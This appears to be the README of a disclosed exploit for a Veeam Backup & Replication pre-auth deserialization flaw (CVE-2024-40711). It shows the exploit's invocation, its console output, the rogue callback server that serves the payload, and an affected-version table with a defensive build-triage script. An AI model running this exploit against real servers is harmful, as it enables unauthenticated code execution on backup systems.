# Exploit for Veeam Backup & Replication Pre-Auth Deserialization (CVE-2024-40711)

See our blog post for technical details.

(Demo video: demo.mp4)
Usage. The command below runs the exploit against a lab target: `-c` is the callback URL of the rogue .NET Remoting HTTP server that the exploit starts on the attacker host, `--targetveeam` is the Veeam Backup & Replication server, and `-f binaryformatter -g Veeam` selects the BinaryFormatter payload wrapped in the CDbCryptoKeyInfo gadget. After the trigger is sent, the target connects back to the `/trigger` channel and is served the payload:

```text
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158

 __ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
 \ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
 \/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
 \/ \/ \/

(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
    - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE GmbH (@codewhitesec)
    - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
    - Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```
This vulnerability was found by Florian Hauser (@frycos) of CODE WHITE GmbH (@codewhitesec). Make sure to follow his outstanding research; our role was only to recreate the issue and develop the exploit for it.
| Version | Status |
|---|---|
| 12.2.0.334 | Fully patched. Not affected by the vulnerabilities described in the blog post. |
| 12.1.2.172 | Affected, but exploitation requires authentication. Low-privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE. |
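A quick way to triage an estate against the table above, as an added example for this README (it is not part of the watchTowr exploit or the blog post): it parses four-part Veeam build numbers and sorts them into the three states the table names. The version string is assumed to be read from each host (for instance the product version shown in the Veeam console); builds newer than 12.2.0.334 are assumed to remain patched, and builds the table does not cover are reported as `unknown` rather than guessed.

```python
"""Triage Veeam Backup & Replication build numbers against the CVE-2024-40711
status table in this README.

Added example for this README, not code from the watchTowr exploit.
Assumptions: the version string comes from the host itself (e.g. the product
version in the Veeam console), and any build newer than 12.2.0.334 is patched.
"""

from typing import Dict, Tuple

# Build numbers taken verbatim from the status table.
PATCHED_BUILD = (12, 2, 0, 334)        # fully patched
AUTH_REQUIRED_BUILD = (12, 1, 2, 172)  # exploitable, but only with credentials
UNAUTH_RCE_MAX = (12, 1, 1, 56)        # this build and everything earlier: pre-auth RCE

Build = Tuple[int, int, int, int]


def parse_build(version: str) -> Build:
    """Turn '12.1.2.172' (an optional leading 'v' is tolerated) into a 4-tuple.

    The table is keyed by full build number, so anything other than exactly
    four dotted integers raises ValueError: a malformed inventory entry must
    be reported, never silently treated as patched.
    """
    parts = version.strip().lstrip("vV").split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a four-part Veeam build number: {version!r}")
    major, minor, update, build = (int(p) for p in parts)
    return (major, minor, update, build)


def classify(version: str) -> str:
    """Map a build to one of: patched, authenticated-rce, unauthenticated-rce, unknown."""
    build = parse_build(version)
    if build >= PATCHED_BUILD:
        return "patched"                # 12.2.0.334 and later (later builds: assumption)
    if build >= AUTH_REQUIRED_BUILD:
        return "authenticated-rce"      # 12.1.2.172 up to, but excluding, 12.2.0.334
    if build <= UNAUTH_RCE_MAX:
        return "unauthenticated-rce"    # 12.1.1.56 and earlier, including 11.x and 12.0.x
    # Builds strictly between 12.1.1.56 and 12.1.2.172 are not listed in the
    # table, so do not guess: flag them for manual review.
    return "unknown"


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Classify every host; unparsable version strings become 'invalid'."""
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = classify(version)
        except ValueError:
            result[host] = "invalid"
    return result


if __name__ == "__main__":
    # Constructed sample inventory (hostnames and versions are made up).
    sample = {
        "bk01": "12.1.1.56",
        "bk02": "12.2.0.334",
        "bk03": "12.1.2.172",
        "bk04": "11.0.1.1261",
        "bk05": "latest",
    }
    for host, status in sorted(triage(sample).items()):
        print(f"{host}: {status}")
```

Hosts reported as `unauthenticated-rce` are reachable by the exploit above without credentials; `authenticated-rce` hosts still need patching, since any low-privilege account suffices.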
This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
We'd also like to take the opportunity to thank Soroush Dalili for his help with this exploit.
Follow watchTowr Labs
For the latest security research, follow the watchTowr Labs team.